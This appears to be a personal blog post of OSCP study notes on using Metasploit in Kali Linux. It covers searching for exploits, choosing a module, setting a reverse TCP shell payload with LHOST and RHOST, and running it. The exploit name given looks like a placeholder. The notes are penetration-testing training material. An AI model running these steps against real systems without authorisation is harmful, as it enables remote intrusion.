These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.
Use Kali Linux for all the following instructions.
Prep:
Ensure postgresql is running.
$> /etc/init.d/postgresql start
Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable
From the command line, fire up the Metasploit console:
$> msfconsole
Search for exploits related to what you are interested in:
msf> search smb
Or, be more specific:
msf> search name:smb type:exploit platform:windows
Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb
Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack
Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp
See what options are set:
msf> show options
Set options as needed:
LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)
msf> set LHOST 192.168.0.x
RHOST is the IP of the victim
msf> set RHOST 192.168.1.x
Default port is 80, but choose one if you wish:
msf> set RPORT 8081
Run the exploit:
msf> exploit
If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:
ls dir pwd id
Photos by Christiaan008,
Be First to Comment